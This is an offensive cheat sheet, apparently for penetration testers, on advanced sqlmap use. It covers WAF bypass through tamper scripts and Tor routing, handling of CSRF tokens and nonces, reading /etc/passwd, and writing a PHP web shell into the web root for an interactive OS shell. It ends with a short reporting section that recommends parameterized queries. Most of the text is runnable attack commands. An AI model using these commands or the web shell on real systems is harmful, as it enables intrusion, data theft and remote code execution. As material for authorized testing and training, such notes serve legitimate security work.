π‘οΈ Methodology Checklist
- Risk/level:
sqlmap -u [URL] --level=5 --risk=3 - Tamper scripts for WAF bypass:
--tamper=space2comment,randomcase - Dump specific table:
sqlmap -u [URL] -D [DB] -T [TABLE] --dump - OS shell:
sqlmap -u [URL] --os-shell - File read:
sqlmap -u [URL] --file-read=/etc/passwd - File write:
sqlmap -u [URL] --file-write=shell.php --file-dest=/var/www/html/shell.php - Proxy through Burp:
--proxy http://127.0.0.1:8080 - Save/restore session:
--session=[FILE]
π― Operational Context
Use when: SQLMap basics insufficient β target requires tamper scripts, custom headers, specific techniques, or WAF bypass to exploit identified SQLi.
Think Dumber First: WAF blocking SQLMap? Try --tamper=space2comment,randomcase first. Then add --delay=2 --random-agent. Still blocked? Add --proxy=http://127.0.0.1:8080 to route through Burp and manually inspect whatβs being blocked.
Skip when: Target is cooperating with basic SQLMap β donβt add complexity you donβt need.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sqlmap -u "http://[TARGET_IP]/?id=1" --level=5 --risk=3 | Max depth (8,000+ payloads) β slow, use last resort |
sqlmap -u "http://[TARGET_IP]/?q=test" --prefix="%'))" --suffix="-- -" | Manual boundary injection |
sqlmap -u "http://[TARGET_IP]/?id=1" --technique=BEU | Only Boolean, Error, UNION (skip slow Time-based) |
sqlmap -u "http://[TARGET_IP]/?id=1" --union-cols=17 | Set exact UNION column count |
sqlmap -u "http://[TARGET_IP]/?id=1" --union-char='a' | Replace NULL filler in UNION |
sqlmap -u "http://[TARGET_IP]/?id=1" --union-from=users | Append FROM clause (Oracle requires this) |
sqlmap -u "http://[TARGET_IP]/?id=1" --code=200 | Anchor TRUE detection to status code |
sqlmap -u "http://[TARGET_IP]/?id=1" --string=success | Anchor TRUE detection to string in HTML |
sqlmap -u "http://[TARGET_IP]/?id=1" --text-only | Compare stripped text only (ignores dynamic HTML) |
sqlmap -u "http://[TARGET_IP]/target.php" --data="id=1&t0ken=[TOKEN]" --csrf-token="t0ken" | Auto-fetch CSRF token per request |
sqlmap -u "http://[TARGET_IP]/?id=1&uid=12345" --randomize=uid --batch | Randomize replay-prevention parameter |
sqlmap -u "http://[TARGET_IP]/?id=1&h=[HASH]" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" | Recalculate dependent parameter per request |
sqlmap -u "http://[TARGET_IP]/" --tor --check-tor | Route through Tor (SOCKS 9050/9150) |
sqlmap -u "http://[TARGET_IP]/" --chunked | Split POST body (bypass signature-based WAFs) |
sqlmap -u "http://[TARGET_IP]/" --tamper=between,randomcase,space2comment | Apply tamper scripts |
sqlmap -u "http://[TARGET_IP]/?id=1" --is-dba | Check DBA status before OS escalation |
sqlmap -u "http://[TARGET_IP]/?id=1" --file-read "/etc/passwd" | Read remote OS file (saved to ~/.sqlmap/output/) |
sqlmap -u "http://[TARGET_IP]/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" | Write local file to remote server |
sqlmap -u "http://[TARGET_IP]/?id=1" --os-shell | Auto-upload stager + interactive OS shell |
sqlmap -u "http://[TARGET_IP]/?id=1" --os-shell --technique=E | Force Error-based if os-shell returns no output |
π¬ Deep Dive & Workflow
Attack Tuning Decision Tree
SQLMap returning no results?
βββ Try --level=5 --risk=3 (last resort β 8,000+ payloads, slow)
β βββ Risk 2+ enables OR payloads (needed for login bypass, risky on UPDATE queries)
βββ Know the boundary? β --prefix="%'))" --suffix="-- -"
βββ Detection confused by dynamic content? β --text-only or --string=known_text
βββ Know column count? β --union-cols=N (skips auto-discovery)
WAF/Protection Bypass
CSRF tokens:
# Token must be fetched fresh before each request
sqlmap -u "http://[TARGET_IP]/target.php" \
--data="id=1&t0ken=abc123" \
--csrf-token="t0ken"
# Verify: token name must match the HTML form attribute EXACTLYDynamic parameters:
# Randomize a nonce/UID that must be unique per request
sqlmap -u "http://[TARGET_IP]/?id=1&uid=12345" --randomize=uid --batch
# Recalculate hash of another parameter
sqlmap -u "http://[TARGET_IP]/?id=1&h=abc" \
--eval="import hashlib; h=hashlib.md5(id).hexdigest()"Tamper Script Reference:
| Script | What it does |
|---|---|
randomcase | SELECT β SeLeCt |
space2comment | spaces β /**/ |
between | > β NOT BETWEEN 0 AND # |
equaltolike | = β LIKE |
base64encode | encodes entire payload |
percentage | SELECT β %S%E%L%E%C%T |
symboliclogical | AND/OR β &&/|| |
0eunion | UNION β e0UNION |
Combine: --tamper=between,randomcase,space2comment
OS Exploitation Chain
# 1. Verify DBA
sqlmap -u "http://[TARGET_IP]/?id=1" --is-dba
# 2. Read files
sqlmap -u "http://[TARGET_IP]/?id=1" --file-read "/etc/passwd"
# Output saved to ~/.sqlmap/output/[target]/
# 3. Write web shell manually
echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://[TARGET_IP]/?id=1" \
--file-write "shell.php" \
--file-dest "/var/www/html/shell.php"
# 4. Auto OS shell (without --batch β specify web lang and path manually)
sqlmap -u "http://[TARGET_IP]/?id=1" --os-shell
# If no output: --os-shell --technique=E--batch trap with --os-shell: Auto-guesses PHP + /var/www/html/. Wrong on IIS/custom paths β stager upload fails. Always run without --batch so you can specify manually.
secure_file_priv block: If --file-write fails despite DBA, check value of secure_file_priv. Non-empty means restricted path; NULL = disabled entirely. Pivot to dumping app credentials instead.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| SQLMap blocked by WAF | Default user-agent and payloads flagged | Combine: --tamper=space2comment,randomcase --random-agent --delay=2 |
| Blind SQLi too slow | Time-based only | Try error-based first: --technique=E; or boolean-based --technique=B β much faster than time-based |
| SQLMap misses injection point | Custom parameter or header | Specify: --data 'param=*' with * marking injection point; or --headers 'X-Custom: *' |
| CSRF token breaks SQLMap requests | Token changes per request | Use --csrf-token=[TOKEN_PARAM] --csrf-url=[URL_TO_GET_TOKEN] |
| SQLMap dumps too much noise | Default verbose | Add -v 0 for quiet; use --output-dir=/tmp/sqlmap_[TARGET] to organize output |
π Reporting Trigger
Finding Title: WAF-Bypassed SQL Injection Enables Automated Database Extraction Impact: SQL injection exploitation with WAF bypass confirms that perimeter security controls can be evaded with publicly available tamper scripts, undermining the security value of the WAF as a compensating control. Root Cause: WAF implementing signature-based detection without behavioral analysis. SQLi vulnerable parameter not remediated at the application layer, relying solely on WAF protection. Recommendation: Fix SQL injection at the source with parameterized queries β WAF is a defense layer, not a fix. Tune WAF to detect encoded and tampered SQLi payloads. Implement behavioral anomaly detection in addition to signature matching.